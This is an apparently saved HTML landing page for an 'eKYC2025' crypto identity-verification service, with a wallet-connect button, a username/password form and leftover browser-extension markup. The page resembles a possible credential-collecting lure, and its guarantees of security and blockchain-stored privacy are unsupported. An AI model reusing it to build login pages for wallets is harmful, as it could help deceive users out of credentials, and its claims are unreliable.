<!DOCTYPE html>



<html lang="en">
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <link rel="icon" type="image/svg+xml" href="./KryptVerse_files/logo-a023a026.png">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>eKYC2025</title>
        <script type="module" crossorigin="" src="./KryptVerse_files/index-82756761.js.download"></script>
        <link rel="stylesheet" href="./KryptVerse_files/index-3b130adc.css">
        <link type="text/css" rel="stylesheet" href="./KryptVerse_files/css2">
        <link rel="stylesheet" href="index-3b130adc.css">
        <script src="block.js"></script>
    </head>
    <body data-new-gr-c-s-check-loaded="14.1207.0" data-gr-ext-installed="">
        <div id="root">
            <div class="min-h-screen">
                <div class="gradient-bg-welcome">
                    <nav class="w-full flex md:justify-center justify-between items-center p-4">
                        <div class="md:flex-[0.5] flex-initial justify-center items-center">
                            <img src="./KryptVerse_files/logo-a023a026.png" alt="logo" class="w-40 cursor-pointer">
                        </div>
                        <ul class="text-white md:flex hidden list-none flex-row justify-between items-center flex-initial">
                            
                            <li class="mx-4 undefined">FAQ</li>
                            <li class="mx-4 undefined">Contact Us</li>
                        </ul>
                        <div class="flex relative">
                            <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 20 20" aria-hidden="true" font-size="28" class="text-white md:hidden cursor-pointer" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                <path fill-rule="evenodd" d="M3 7a1 1 0 011-1h12a1 1 0 110 2H4a1 1 0 01-1-1zM3 13a1 1 0 011-1h12a1 1 0 110 2H4a1 1 0 01-1-1z" clip-rule="evenodd"></path>
                            </svg>
                        </div>
                    </nav>
                    <div class="flex w-full justify-center items-center">
                        <div class="flex md:flex-row flex-col items-start justify-between md:p-20 py-8 px-4">
                            <div class="flex flex-1 justify-start items-start flex-col md:mr-10">
                                <h1 class="text-3xl sm:text-5xl text-white py-1">
                                    Secure Identity Verification<br>for the Modern World
                                </h1>
                                <p class="text-left mt-5 text-white font-light md:w-9/12 w-11/12 text-base">Effortlessly verify your identity using our decentralized eKYC platform. Seamlessly access global financial services with trust and security.</p>
                                <button
    type="button"
    class="flex flex-row justify-center items-center my-5 bg-[#2952e3] p-3 rounded-full cursor-pointer hover:bg-[#2546bd]"
    onclick="connectWallet()"
>
    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" class="text-white mr-2" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
        <path d="M512 64C264.6 64 64 264.6 64 512s200.6 448 448 448 448-200.6 448-448S759.4 64 512 64zm144.1 454.9L437.7 677.8a8.02 8.02 0 0 1-12.7-6.5V353.7a8 8 0 0 1 12.7-6.5L656.1 506a7.9 7.9 0 0 1 0 12.9z"></path>
    </svg>
    <p class="text-white text-base font-semibold">Connect Wallet</p>
</button>

                                <div class="grid sm:grid-cols-3 grid-cols-2 w-full mt-10">
                                    <div class="rounded-tl-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Reliability</div>
                                    <div class="min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Security</div>
                                    <div class="sm:rounded-tr-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Ethereum</div>
                                    <div class="rounded-bl-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Web 3.0</div>
                                    <div class="min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Privacy</div>
                                    <div class="rounded-br-2xl min-h-[70px] sm:px-0 px-2 sm:min-w-[120px] flex justify-center items-center border-[0.5px] border-gray-400 text-sm font-light text-white">Blockchain</div>
                                </div>
                            </div>
                            <div class="flex flex-col flex-1 items-center justify-start w-full mf:mt-0 mt-10">
                                <div class="p-3 flex justify-end items-start flex-col rounded-xl h-40 sm:w-72 w-full my-5 eth-card .white-glassmorphism ">
                                    <div class="flex justify-between flex-col w-full h-full">
                                        <div class="flex justify-between items-start">
                                            <div class="w-10 h-10 rounded-full border-2 border-white flex justify-center items-center">
                                                <svg stroke="currentColor" fill="currentColor" stroke-width="0" role="img" viewBox="0 0 24 24" font-size="21" color="#fff" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg" style="color: rgb(255, 255, 255);">
                                                    <title></title>
                                                    <path d="M11.944 17.97L4.58 13.62 11.943 24l7.37-10.38-7.372 4.35h.003zM12.056 0L4.69 12.223l7.365 4.354 7.365-4.35L12.056 0z"></path>
                                                </svg>
                                            </div>
                                        </div>
                                        <div>
                                            <p class="text-white font-light text-sm">...</p>
                                            <p class="text-white font-semibold text-lg mt-1">Ethereum</p>
                                        </div>
                                    </div>
                                </div>
                                <div class="p-5 sm:w-96 w-full flex flex-col justify-start items-center blue-glassmorphism">
                                    <input placeholder="Username" type="text" step="0.0001" class="my-2 w-full rounded-sm p-2 outline-none bg-transparent text-white border-none text-sm white-glassmorphism" value="" fdprocessedid="nojofo">
                                    <input placeholder="Password" type="number"  class="my-2 w-full rounded-sm p-2 outline-none bg-transparent text-white border-none text-sm white-glassmorphism" value="" fdprocessedid="qmtc8h">
                                    
                                    <div class="h-[1px] w-full bg-gray-400 my-2"></div>
                                    <a href="next.html">
                                    <button type="button" class="text-white w-full mt-2 border-[1px] p-2 border-[#3d4f7c] hover:bg-[#3d4f7c] rounded-full cursor-pointer" fdprocessedid="ywgec" onclick=connectWallet()> Send now </button>
                                    </a>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="flex w-full justify-center items-center gradient-bg-services">
                    <div class="flex mf:flex-row flex-col items-center justify-between md:p-20 py-12 px-4">
                        <div class="flex-1 flex flex-col justify-start items-start">
                            <h1 class="text-white text-3xl sm:text-5xl py-2 ">
                                Services that we<br>continue to improve
                            </h1>
                            <p class="text-left my-2 text-white font-light md:w-9/12 w-11/12 text-base">Your trusted solution for seamless and secure identity verification, offering a comprehensive suite of user-friendly eKYC services tailored to your needs</p>
                        </div>
                        <div class="flex-1 flex flex-col justify-start items-center">
                            <div class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                                <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#2952E3]">
                                    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 16 16" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                        <path fill-rule="evenodd" d="M8 0c-.69 0-1.843.265-2.928.56-1.11.3-2.229.655-2.887.87a1.54 1.54 0 0 0-1.044 1.262c-.596 4.477.787 7.795 2.465 9.99a11.777 11.777 0 0 0 2.517 2.453c.386.273.744.482 1.048.625.28.132.581.24.829.24s.548-.108.829-.24a7.159 7.159 0 0 0 1.048-.625 11.775 11.775 0 0 0 2.517-2.453c1.678-2.195 3.061-5.513 2.465-9.99a1.541 1.541 0 0 0-1.044-1.263 62.467 62.467 0 0 0-2.887-.87C9.843.266 8.69 0 8 0zm2.146 5.146a.5.5 0 0 1 .708.708l-3 3a.5.5 0 0 1-.708 0l-1.5-1.5a.5.5 0 1 1 .708-.708L7.5 7.793l2.646-2.647z"></path>
                                    </svg>
                                </div>
                                <div class="ml-5 flex flex-col flex-1">
                                    <h3 class="mt-2 text-white text-lg">Security gurantee</h3>
                                    <p class="mt-1 text-white text-sm md:w-9/12">Security is guranteed. We always maintain privacy and maintain the quality of our products</p>
                                </div>
                            </div>
                            <div class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                                <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#8945F8]">
                                    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                        <path d="M10 18a7.952 7.952 0 0 0 4.897-1.688l4.396 4.396 1.414-1.414-4.396-4.396A7.952 7.952 0 0 0 18 10c0-4.411-3.589-8-8-8s-8 3.589-8 8 3.589 8 8 8zm0-14c3.309 0 6 2.691 6 6s-2.691 6-6 6-6-2.691-6-6 2.691-6 6-6z"></path>
                                        <path d="M11.412 8.586c.379.38.588.882.588 1.414h2a3.977 3.977 0 0 0-1.174-2.828c-1.514-1.512-4.139-1.512-5.652 0l1.412 1.416c.76-.758 2.07-.756 2.826-.002z"></path>
                                    </svg>
                                </div>
                                <div class="ml-5 flex flex-col flex-1">
                                    <h3 class="mt-2 text-white text-lg">Trusted Verification</h3>
                                    <p class="mt-1 text-white text-sm md:w-9/12">We offer seamless identity verification with the highest standards of privacy and data protection. Your personal information is encrypted and securely stored on the blockchain, ensuring full confidentiality.</p>
                                </div>
                            </div>
                            <div class="flex flex-row justify-start items-start white-glassmorphism p-3 m-2 cursor-pointer hover:shadow-xl">
                                <div class="w-10 h-10 rounded-full flex justify-center items-center bg-[#F84550]">
                                    <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" font-size="21" class="text-white" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                        <g>
                                            <path fill="none" d="M0 0H24V24H0z"></path>
                                            <path d="M20.243 4.757c2.262 2.268 2.34 5.88.236 8.236l-8.48 8.492-8.478-8.492c-2.104-2.356-2.025-5.974.236-8.236C5.515 3 8.093 2.56 10.261 3.44L6.343 7.358l1.414 1.415L12 4.53l-.013-.014.014.013c2.349-2.109 5.979-2.039 8.242.228z"></path>
                                        </g>
                                    </svg>
                                </div>
                                <div class="ml-5 flex flex-col flex-1">
                                    <h3 class="mt-2 text-white text-lg">Commitment to Excellence</h3>
                                    <p class="mt-1 text-white text-sm md:w-9/12">We prioritize data integrity and privacy while delivering a seamless and efficient user experience.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="w-full flex md:justify-center justify-between items-center flex-col p-4 gradient-bg-footer">
                    <div class="w-full flex sm:flex-row flex-col justify-between items-center my-4">
                        <div class="flex flex-[0.5] justify-center items-center">
                            <img src="./KryptVerse_files/logo-a023a026.png" alt="logo" class="w-32">
                        </div>
                        <div class="flex flex-1 justify-evenly items-center flex-wrap sm:mt-0 mt-5 w-full">
                          
                            <p class="text-white text-base text-center mx-2">FAQ</p>
                            <p class="text-white text-base text-center mx-2">Contact Us</p>
                        </div>
                    </div>
                    <div class="flex justify-center items-center flex-col mt-5">
                        <p class="text-white text-sm text-center">Come join us and hear for the unexpected miracle</p>
                    </div>
                    <div class="sm:w-[90%] w-full h-[0.25px] bg-gray-400 mt-5 "></div>
                    <div class="sm:w-[90%] w-full flex justify-between items-center mt-3">
                        <p class="text-white text-left text-xs">@eKYC2025</p>
                        <p class="text-white text-right text-xs">All rights reserved</p>
                    </div>
                </div>
            </div>
        </div>
        <span id="PING_IFRAME_FORM_DETECTION" style="display: none;"></span>
        <span class="glasp-extension" style="display: block; width: 320px; margin: unset; padding: unset; border: unset; border-radius: unset; outline: unset; background-color: unset; box-shadow: unset; position: fixed; top: 40px; right: 24px; z-index: 9999;">
            <template shadowrootmode="open">
                <div class="glasp-extension" style="font-family: Inter;"></div>
            </template>
        </span>
        <div class="glasp-extension" style="display: block; width: unset; margin: unset; padding: unset; border: unset; border-radius: unset; outline: unset; background-color: unset; box-shadow: unset; position: fixed; bottom: 16px; right: 16px; z-index: 9999;">
            <template shadowrootmode="open">
                <div class="glasp-extension" style="font-family: Inter;"></div>
            </template>
        </div>
        <span id="PING_CONTENT_DLS_POPUP" style="display: none;"></span>
        <div style="background-color: transparent; border: none; bottom: 15px; display: block; margin: 0px; opacity: 1; padding: 0px; position: fixed; right: 15px; z-index: 2147483647;">
            <template shadowrootmode="closed">
                <style>
                    /*!
 * 
 *     MCAFEE RESTRICTED CONFIDENTIAL
 *     Copyright (c) 2024 McAfee, LLC
 *
 *     The source code contained or described herein and all documents related
 *     to the source code ("Material") are owned by McAfee or its
 *     suppliers or licensors. Title to the Material remains with McAfee
 *     or its suppliers and licensors. The Material contains trade
 *     secrets and proprietary and confidential information of McAfee or its
 *     suppliers and licensors. The Material is protected by worldwide copyright
 *     and trade secret laws and treaty provisions. No part of the Material may
 *     be used, copied, reproduced, modified, published, uploaded, posted,
 *     transmitted, distributed, or disclosed in any way without McAfee's prior
 *     express written permission.
 *
 *     No license under any patent, copyright, trade secret or other intellectual
 *     property right is granted to or conferred upon you by disclosure or
 *     delivery of the Materials, either expressly, by implication, inducement,
 *     estoppel or otherwise. Any license under such intellectual property rights
 *     must be expressed and approved by McAfee in writing.
 *
 */
                    @import url(https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Poppins:ital,wght@0,400;0,500;0,600;0,800;1,400;1,500;1,600;1,800&display=swap); * {
                        border: 0;
                        box-sizing: border-box;
                        font: inherit;
                        font-family: "mcafeeOpenSans","Poppins",Helvetica,Arial,Arial,Helvetica,sans-serif;
                        font-size: 100%;
                        margin: 0;
                        padding: 0;
                        vertical-align: baseline;
                        outline: none
                    }

                    article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section {
                        display: block
                    }

                    html,body {
                        background-color: #f5f6fa;
                        font-family: "Poppins",Helvetica,Arial,"mcafeeOpenSans",Arial,Helvetica,sans-serif;
                        line-height: 1;
                        height: 100%;
                        width: 100%
                    }

                    ol,ul {
                        list-style: none
                    }

                    blockquote,q {
                        quotes: none
                    }

                    blockquote:after,blockquote:before,q:after,q:before {
                        content: "";
                        content: none
                    }

                    table {
                        border-collapse: collapse;
                        border-spacing: 0
                    }

                    b {
                        font-weight: bold
                    }

                    img {
                        display: block
                    }

                    .dls__container {
                        align-items: center;
                        display: flex;
                        margin: 0 auto;
                        margin-top: 50px;
                        position: relative
                    }

                    .dls__popup__expanded {
                        align-items: center;
                        overflow: hidden;
                        border-radius: 100px;
                        cursor: pointer;
                        display: flex;
                        left: 0;
                        padding: 15px;
                        position: absolute;
                        height: 95px;
                        width: 383px;
                        background-color: #fff;
                        transition: all .3s ease-in-out
                    }

                    .dls__popup__expanded .dls__icon {
                        height: 65px;
                        width: 73px
                    }

                    .content {
                        margin-left: 12px
                    }

                    .content .content__images {
                        display: flex;
                        align-items: center;
                        width: 250px
                    }

                    .content .content__images .seperator__line {
                        margin-left: 5px;
                        margin-right: 10px
                    }

                    .content .content__images #dls_close_icon {
                        cursor: pointer;
                        margin-left: auto;
                        margin-right: 0px
                    }

                    .content p {
                        font-family: "Poppins",Arial,Helvetica,sans-serif;
                        font-weight: "400";
                        font-size: 14px;
                        line-height: 20px;
                        margin-top: 8px;
                        color: #4258ff;
                        width: 250px;
                        cursor: pointer
                    }

                    .shield {
                        overflow: hidden;
                        box-shadow: 0px 2px 4px 0px rgba(33,41,52,.12),0px -1px 2px 0px rgba(0,0,0,.08);
                        align-items: center;
                        border-radius: 100px;
                        bottom: 0;
                        display: flex;
                        height: 95px;
                        justify-content: center;
                        position: absolute;
                        right: 0;
                        width: 383px;
                        transition: all .3s ease-in-out
                    }

                    .shield__circle {
                        display: flex;
                        justify-content: center;
                        align-items: center;
                        width: 55px;
                        height: 55px;
                        background-color: #c01818;
                        transition: all .6s ease-in-out .2s;
                        z-index: 1;
                        opacity: 0
                    }

                    /*# sourceMappingURL=../sourceMap/chrome/css/download_scan_popup.css.map*/
                </style>
                <div class="dls__container">
                    <div class="shield" style="background: transparent; opacity: 0.1; display: none;">
                        <div class="shield__circle" style="opacity: 1;">
                            <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/mcafee_logo_white.svg?secret=mpf04t" x-mcsrc="" id="dls_ballon_icon" x-mcsrcparsed="true">
                        </div>
                        <div class="dls__popup__expanded" style="opacity: 0;">
                            <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/download_scan_icon.svg?secret=mpf04t" x-mcsrc="" class="dls__icon" x-mcsrcparsed="true">
                            <div class="content">
                                <div class="content__images">
                                    <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/mcafee_logo_red.svg?secret=mpf04t" x-mcsrc="" id="dls_mcafee_logo" x-mcsrcparsed="true">
                                    <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/seperator_line.svg?secret=mpf04t" x-mcsrc="" class="seperator__line" x-mcsrcparsed="true">
                                    <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/webadvisor.svg?secret=mpf04t" x-mcsrc="" x-mcsrcparsed="true">
                                    <img src="chrome-extension://fheoggkfdfchfphceeifdbepaooicaho/images/download_scan/close-outline.svg?secret=mpf04t" x-mcsrc="" id="dls_close_icon" x-mcsrcparsed="true">
                                </div>
                                <p id="download_scan_popup_expanded_descriptions">Your download's being scanned. We'll let you know if there's an issue.</p>
                            </div>
                        </div>
                    </div>
                </div>
                <style>
                    /*!
 * 
 *     MCAFEE RESTRICTED CONFIDENTIAL
 *     Copyright (c) 2024 McAfee, LLC
 *
 *     The source code contained or described herein and all documents related
 *     to the source code ("Material") are owned by McAfee or its
 *     suppliers or licensors. Title to the Material remains with McAfee
 *     or its suppliers and licensors. The Material contains trade
 *     secrets and proprietary and confidential information of McAfee or its
 *     suppliers and licensors. The Material is protected by worldwide copyright
 *     and trade secret laws and treaty provisions. No part of the Material may
 *     be used, copied, reproduced, modified, published, uploaded, posted,
 *     transmitted, distributed, or disclosed in any way without McAfee's prior
 *     express written permission.
 *
 *     No license under any patent, copyright, trade secret or other intellectual
 *     property right is granted to or conferred upon you by disclosure or
 *     delivery of the Materials, either expressly, by implication, inducement,
 *     estoppel or otherwise. Any license under such intellectual property rights
 *     must be expressed and approved by McAfee in writing.
 *
 */
                    .mc-interactive-balloon {
                        position: absolute;
                        right: -50px;
                        bottom: 8px;
                        box-shadow: rgba(0,0,0,.12) 0px 0px 10px;
                        height: 40px;
                        width: 40px;
                        background: #1671ee;
                        border-radius: 20px;
                        display: flex;
                        justify-content: center;
                        align-items: center
                    }

                    /*# sourceMappingURL=../sourceMap/chrome/css/interactive_balloon.css.map*/
                </style>
            </template>
        </div>
    </body>
    <grammarly-desktop-integration data-grammarly-shadow-root="true">
        <template shadowrootmode="open">
            <style>
                div.grammarly-desktop-integration {
                    position: absolute;
                    width: 1px;
                    height: 1px;
                    padding: 0;
                    margin: -1px;
                    overflow: hidden;
                    clip: rect(0, 0, 0, 0);
                    white-space: nowrap;
                    border: 0;
                    -moz-user-select: none;
                    -webkit-user-select: none;
                    -ms-user-select: none;
                    user-select: none;
                }

                div.grammarly-desktop-integration:before {
                    content: attr(data-content);
                }
            </style>
            <div aria-label="grammarly-integration" role="group" tabindex="-1" class="grammarly-desktop-integration" data-content="{&quot;mode&quot;:&quot;full&quot;,&quot;isActive&quot;:true,&quot;isUserDisabled&quot;:false}"></div>
        </template>
    </grammarly-desktop-integration>
</html>
